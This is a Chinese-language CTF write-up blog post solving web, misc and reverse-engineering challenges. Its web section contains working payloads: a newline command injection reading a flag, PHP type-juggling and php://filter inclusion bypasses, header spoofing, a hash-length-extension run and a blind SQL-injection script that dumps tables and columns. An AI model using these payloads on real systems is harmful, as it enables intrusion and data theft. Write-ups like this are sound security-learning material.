NEKO

[Untitled Post]

2016/05/01

WEB

比较数字大小

F12改input maxlength,再填个较大的数.

你能跨过去吗

实验吧上的原题
由+/v+知道是utf-7编码,将后面的数据utf-7解码,输入key即可

web01

password[]=1

为什么这么简单啊

源码password.js
加个=号 base64

一切都是套路

index.php.txt源码泄露.
原题:https://github.com/CHYbeta/Code-Audit-Challenges/blob/master/php/challenge-17.md

本地的诱惑

题目崩了,源代码可看源码
考点是xff伪造

请ping我的ip 看你能Ping通吗?

post:
ip=127.0.0.1%0a(cat flag)

Please give me username and password!

index.php.txt源码泄露
payload:

1
http://118.190.152.202:8017/index.php?username[]=1&password=1e9

你能绕过吗?

文件包含+大小写绕过
payload:

1
http://118.190.152.202:8008/index.php?f=PHP://filter/read=convert.base64-encode/resource=index&id=1

web02

bp:

1
2
3
4
5
6
7
GET / HTTP/1.1
Host: 118.190.152.202:8004
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
client-ip: 127.0.0.1
Connection: close

php世界上最好的语言

0e开头的md5
?a=GLOBALS

SQL注入的艺术

宽字节注入

试试看

原题:http://blog.chrstm.com/2017/02/06/hctfGame3/

注注注

写脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# encoding=utf-8
import requests
import string
dic=string.ascii_letters+string.digits+'{}@,_?'
correct_status='normal user'
url="http://118.190.152.202:8011/"
strs=''
for j in range(150):
for i in dic:
choice=4
if choice==1:
#爆数据库
data={"username":"admin' and left(database(),%s)='%s'#"%(j,strs+i),'password':'123'}
elif choice==2:
# 爆表 news,user
data = {"username": "admin' and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s)='%s'#" % (j, strs + i), 'password': '123'}
elif choice==3:
#字段 title,note,kjafuibafuohnuvwnruniguankacbh,id,date,text
data = {"username": "admin' and left((select group_concat(column_name) from information_schema.columns where table_name='news'),%s)='%s'#" % (
j, strs + i), 'password': '123'}
elif choice==4:
#flag
data = {"username": "admin' and left((select kjafuibafuohnuvwnruniguankacbh from news),%s)='%s'#" % (
j, strs + i), 'password': '123'}

r=requests.post(url=url,data=data).text
if correct_status in r:
strs+=i
print(strs)
break

Collide

hash扩展攻击

1
2
3
4
5
root@neko:~/ctf/hash_extender# ./hash_extender -d guest -s 78cfc57d983b4a17e55828c001a3e781 -f md5 -l 46 -a admin --out-data-format html
Type: md5
Secret length: 46
New signature: 5f585093a7fe86971766c3d25c43d0eb
New string: guest%80%00%00%00%00%98%01%00%00%00%00%00%00admin

Only admin can see flag

cbc字节翻转

MISC

数字密文

decode(‘hex’)

What is that?

winhex改变png高度

秘密电报

培根
不要用米特斯安全团队的CTFtools解,日了狗了.

有趣的ISCC

binwalk->zlib,zlib后面有数据,unicode.

Where is the FLAG?

载入ps说是有adobe fireworks的数据
用adobe fireworks打开发现有二维码的图层

重重谍影

base64解到:

1
U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1ziN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=

注意把%0a删了,aes解密http://tool.oschina.net/encrypt/
再与佛论禅解密:
http://www.keyfc.net/bbs/tools/tudoucode.aspx

暴力XX不可取

zip伪加密->凯撒解密

一只猫的心思

图片后面有个doc,binwalk没出来不知道为什么.
doc->佛论禅解密->hex,base64,base32多重解密

凯撒十三世

rot13解出来:roqtp697t95j3
看键盘,斜着看下一个键.

RE

RSA

flag格式就不能统一下:
flag{3b6d3806-4b2b-11e7-95a0-000c29d7e93d}
老套路求出所有参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
from Crypto.PublicKey import RSA
def egcd(a,b):
if b==0:
return a,1,0
else:
g,x,y=egcd(b,a%b)
return g,y,x-a//b*y
pub=RSA.importKey(open("public.key").read())
n=pub.n #n=98432079271513130981267919056149161631892822707167177858831841699521774310891
e=pub.e #e=65537
# print n
# print e
p=302825536744096741518546212761194311477
q=325045504186436346209877301320131277983


d=egcd(e,(p-1)*(q-1))[1]

c1=int((open('encrypted.message1','rb').read()).encode('hex'),16)
m1=hex(pow(c1,d,n))[2:].replace('L','')
if(len(m1)%2==1):
m1='0'+m1

c2=int((open('encrypted.message2','rb').read()).encode('hex'),16)
m2=hex(pow(c2,d,n))[2:].replace('L','')
if(len(m2)%2==1):
m2='0'+m2

c3=int((open('encrypted.message3','rb').read()).encode('hex'),16)
m3=hex(pow(c3,d,n))[2:].replace('L','')
if(len(m3)%2==1):
m3='0'+m3
print m1.decode('hex')
print m2.decode('hex')
print m3.decode('hex')

My math is bad

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
puts("=======================================");
puts("= Welcome to the flag access machine! =");
puts("= Input the password to login ... =");
puts("=======================================");
__isoc99_scanf("%s", s);
if ( (unsigned int)sub_400766() )
{
puts("Congratulations! You should get the flag...");
sub_400B16();
}
else
{
puts("Wrong password!");
}
return 0LL;
}

判断函数为sub_400766()

整理下sub_400766():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
  if ( strlen(s) != 32 )
return 0LL;
x1 = s_16;
x2 = s_20;
x3 = s_24;
x4 = s_28;
if ( s_4 * (signed __int64)*(signed int *)s - s_12 * (signed __int64)s_8 != 2652042832920173142LL )
goto LABEL_15;
if ( 3LL * s_8 + 4LL * s_12 - s_4 - 2LL * *(signed int *)s != 397958918 )
goto LABEL_15;
if ( 3 * *(signed int *)s * (signed __int64)s_12 - s_8 * (signed __int64)s_4 != 3345692380376715070LL )
goto LABEL_15;
if ( 27LL * s_4 + *(signed int *)s - 11LL * s_12 - s_8 != 40179413815LL )
goto LABEL_15;
srand(s_8 ^ s_4 ^ *(_DWORD *)s ^ s_12);
v1 = rand() % 50;
v2 = rand() % 50;
v7 = rand() % 50;
v8 = rand() % 50;
v9 = rand() % 50;
v10 = rand() % 50;
v11 = rand() % 50;
v12 = rand() % 50;
if ( x4 * v2 + x1 * v1 - x2 - x3 != 61799700179LL
|| x4 + x1 + x3 * v8 - x2 * v7 != 48753725643LL
|| x1 * v9 + x2 * v10 - x3 - x4 != 59322698861LL
|| x3 * v12 + x1 - x2 - x4 * v11 != 51664230587LL )
{
LABEL_15:
result = 0LL;
}
else
{
result = 1LL;
}
return result;
}

先解第一个方程组,把s的前半部分求出来
第二个方程组需要s_8 ^ s_4 ^ (_DWORD )s ^ s_12作为种子来生成第二个方程组的参数
解出s的后半部分
把s输入即可得到flag
解方程用sympy比较好:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
# encoding=utf-8
import struct
from sympy import *
# 解第一个方程组
# x1=Symbol('x1')
# x2=Symbol('x2')
# x3=Symbol('x3')
# x4=Symbol('x4')
# print solve([(x2*x1)-(x4*x3)-2652042832920173142,
# 3*x3+4*x4-x2-2*x1-397958918,
# (3*x1*x4)-(x3*x2)-3345692380376715070,
# 27*x2+x1-11*x4-x3-40179413815],[x1,x2,x3,x4])


x1=1869639009
x2=1801073242
x3=829124174
x4=862734414
x=(x1,x2,x3,x4)
half1_s=''
for i in x:
half1_s+=struct.pack('I',i) #小端序打包

#x3^x2^x1^x4=103643451

v1=125279272%50
v2=774372789%50
v7=1384667095%50
v8=155318995%50
v9=311698135%50
v10=1917753591%50
v11=641718563%50
v12=1386974386%50

# 解第二个方程组
# x1=Symbol('x1')
# x2=Symbol('x2')
# x3=Symbol('x3')
# x4=Symbol('x4')
# print solve([x4 * v2 + x1 * v1 - x2 - x3-61799700179,
# x4 + x1 + x3 * v8 - x2 * v7-48753725643,
# x1 * v9 + x2 * v10 - x3 - x4 - 59322698861,
# x3 * v12 + x1 - x2 - x4 * v11 - 51664230587],[x1,x2,x3,x4])


x1=811816014
x2=828593230
x3=1867395930
x4=1195788129
x=(x1,x2,x3,x4)
half2_s=''
for i in x:
half2_s+=struct.pack('I',i) #小端序打包
print half1_s+half2_s

原文作者: n3k0

发表日期: May 1st 2016, 1:09:27

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. WEB
    1. 1.1. 比较数字大小
    2. 1.2. 你能跨过去吗
    3. 1.3. web01
    4. 1.4. 为什么这么简单啊
    5. 1.5. 一切都是套路
    6. 1.6. 本地的诱惑
    7. 1.7. 请ping我的ip 看你能Ping通吗?
    8. 1.8. Please give me username and password!
    9. 1.9. 你能绕过吗?
    10. 1.10. web02
    11. 1.11. php世界上最好的语言
    12. 1.12. SQL注入的艺术
    13. 1.13. 试试看
    14. 1.14. 注注注
    15. 1.15. Collide
    16. 1.16. Only admin can see flag
  2. 2. MISC
    1. 2.1. 数字密文
    2. 2.2. What is that?
    3. 2.3. 秘密电报
    4. 2.4. 有趣的ISCC
    5. 2.5. Where is the FLAG?
    6. 2.6. 重重谍影
    7. 2.7. 暴力XX不可取
    8. 2.8. 一只猫的心思
    9. 2.9. 凯撒十三世
  3. 3. RE
    1. 3.1. RSA
    2. 3.2. My math is bad